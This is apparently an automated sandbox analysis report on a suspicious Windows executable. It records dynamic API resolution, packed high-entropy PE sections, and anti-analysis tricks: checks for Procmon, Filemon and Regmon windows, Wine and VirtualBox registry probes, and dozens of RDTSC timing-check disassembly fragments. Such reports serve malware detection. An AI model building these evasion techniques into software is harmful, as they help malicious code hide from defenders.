              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009068F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009068F0
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x1bc6e1 should be: 0x1c2d74
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: yktwzmco
              Source: file.exe | Static PE information: section name: jxtdziyw
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D0F8D3 push 2D64E4A3h; mov dword ptr [esp], edx | 1_2_00D0F912
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00DC08D7 push edx; mov dword ptr [esp], 6BEB8DD9h | 1_2_00DC08F2
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D520C8 push esi; mov dword ptr [esp], edi | 1_2_00D52104
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00D7E0F2 push ecx; mov dword ptr [esp], 32487D7Ah | 1_2_00D7E9C5
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 538DC047h; mov dword ptr [esp], ecx | 1_2_00CA2144
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push esi; mov dword ptr [esp], ebp | 1_2_00CA21AE
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ebx; mov dword ptr [esp], edx | 1_2_00CA21D6
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push eax; mov dword ptr [esp], ecx | 1_2_00CA231D
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ebx; mov dword ptr [esp], edi | 1_2_00CA233A
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ebp; mov dword ptr [esp], ebx | 1_2_00CA238C
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 00662B76h; mov dword ptr [esp], ebp | 1_2_00CA241E
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ecx; mov dword ptr [esp], edx | 1_2_00CA249A
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 2D852466h; mov dword ptr [esp], eax | 1_2_00CA24B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edi; mov dword ptr [esp], ebx | 1_2_00CA2622
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edx; mov dword ptr [esp], esi | 1_2_00CA2628
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edx; mov dword ptr [esp], eax | 1_2_00CA266B
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ebx; mov dword ptr [esp], edx | 1_2_00CA26CE
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ecx; mov dword ptr [esp], edx | 1_2_00CA26D7
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ebx; mov dword ptr [esp], esi | 1_2_00CA270B
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ecx; mov dword ptr [esp], eax | 1_2_00CA272E
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push ecx; mov dword ptr [esp], 5F092804h | 1_2_00CA275E
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 5BD84524h; mov dword ptr [esp], eax | 1_2_00CA27A1
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 5F86DBD6h; mov dword ptr [esp], edi | 1_2_00CA27AC
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 37E10105h; mov dword ptr [esp], ebp | 1_2_00CA2823
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edi; mov dword ptr [esp], 67B79601h | 1_2_00CA2844
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 03BA3DEAh; mov dword ptr [esp], edx | 1_2_00CA28D1
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 46E5E50Ch; mov dword ptr [esp], ebx | 1_2_00CA29D2
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edi; mov dword ptr [esp], ecx | 1_2_00CA29FC
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edx; mov dword ptr [esp], ecx | 1_2_00CA2A18
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push edx; mov dword ptr [esp], ecx | 1_2_00CA2A40
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA push 1913A9D1h; mov dword ptr [esp], edi | 1_2_00CA2AE4
              Source: file.exe | Static PE information: section name: yktwzmco entropy: 7.954359902846811

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Code function: MSHN6QKQEMU MSHN6QKQEMU | 1_2_008E2A90
              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_1-27372
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDBF0D second address: CDBF2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA1D8D18344h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDBF2F second address: CDBF3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC558 second address: CDC572 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1D8D1833Fh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC572 second address: CDC577 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCB91 second address: CDCBE4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FA1D8D18338h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 nop 0x00000027 jno 00007FA1D8D18354h 0x0000002d push eax 0x0000002e pushad 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC8A second address: CDCC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD0CA second address: CDD0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD0CE second address: CDD0E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD6B3 second address: CDD6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FA1D8D1833Ch 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD6CA second address: CDD705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 11DC41E1h 0x00000010 jmp 00007FA1D8D64E65h 0x00000015 push 00000000h 0x00000017 mov esi, 099D2CC4h 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D1B67h] 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD705 second address: CDD70A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE061 second address: CDE075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFB1A second address: CDFB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0809 second address: CE081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007FA1D8D64E56h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE081D second address: CE0822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0822 second address: CE0827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0827 second address: CE0886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA1D8D18336h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FA1D8D18338h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 add edi, 6AE29C3Dh 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D27C2h], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FA1D8D18338h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0886 second address: CE088C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE088C second address: CE0892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0892 second address: CE0896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0896 second address: CE08A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1D5B second address: CE1DC4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1D8D64E5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007FA1D8D64E5Eh 0x00000011 nop 0x00000012 push edi 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FA1D8D64E58h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D3102h], eax 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA1D8D64E64h 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE287B second address: CE287F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE287F second address: CE289E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1D8D64E67h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE289E second address: CE28A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE449C second address: CE44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E5Dh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1D8D64E66h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE44C6 second address: CE44CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE44CC second address: CE44D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F42 second address: CE6F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F4C second address: CE6F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F50 second address: CE6F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FA1D8D1833Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F63 second address: CE6F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F67 second address: CE6F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F6C second address: CE6F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9E30 second address: CE9E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA1D8D18336h 0x0000000a jmp 00007FA1D8D18343h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E557 second address: C9E561 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1D8D64E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA417 second address: CEA41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA41B second address: CEA41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10BB second address: CE10C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC4B0 second address: CEC4B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE5AD second address: CEE5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE5B1 second address: CEE5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE5B5 second address: CEE5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF492 second address: CEF511 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1D8D64E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA1D8D64E5Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007FA1D8D64E61h 0x00000017 pop ebx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FA1D8D64E58h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FA1D8D64E58h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov edi, eax 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 jbe 00007FA1D8D64E56h 0x0000005d pop eax 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF511 second address: CEF538 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1D8D18338h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA1D8D18348h 0x00000013 jmp 00007FA1D8D18342h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25CA second address: CE25F1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1D8D64E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FA1D8D64E68h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25F1 second address: CE260C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18347h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06B6 second address: CF06BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06BB second address: CF06C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0745 second address: CF0750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2643 second address: CF2649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2649 second address: CF264E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF364B second address: CF36B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push esi 0x00000008 call 00007FA1D8D18338h 0x0000000d pop esi 0x0000000e mov dword ptr [esp+04h], esi 0x00000012 add dword ptr [esp+04h], 0000001Dh 0x0000001a inc esi 0x0000001b push esi 0x0000001c ret 0x0000001d pop esi 0x0000001e ret 0x0000001f xor dword ptr [ebp+122D5650h], eax 0x00000025 mov ebx, 0C18A92Eh 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1C59h], eax 0x00000032 mov dword ptr [ebp+122D191Dh], ebx 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b jo 00007FA1D8D1833Ch 0x00000041 mov edi, dword ptr [ebp+122D196Dh] 0x00000047 pop edi 0x00000048 xchg eax, esi 0x00000049 jmp 00007FA1D8D18341h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF36B6 second address: CF36BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF36BA second address: CF36C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7F50 second address: CE7F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8017 second address: CE801C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE801C second address: CE8022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5711 second address: CF5715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF57D2 second address: CF57D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC6D3 second address: CEC6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6682 second address: CF6686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6686 second address: CF6694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FA1D8D18336h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8716 second address: CF8743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jng 00007FA1D8D64E56h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FA1D8D64E68h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8743 second address: CF874D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA1D8D18336h 0x0000000a rdtsc
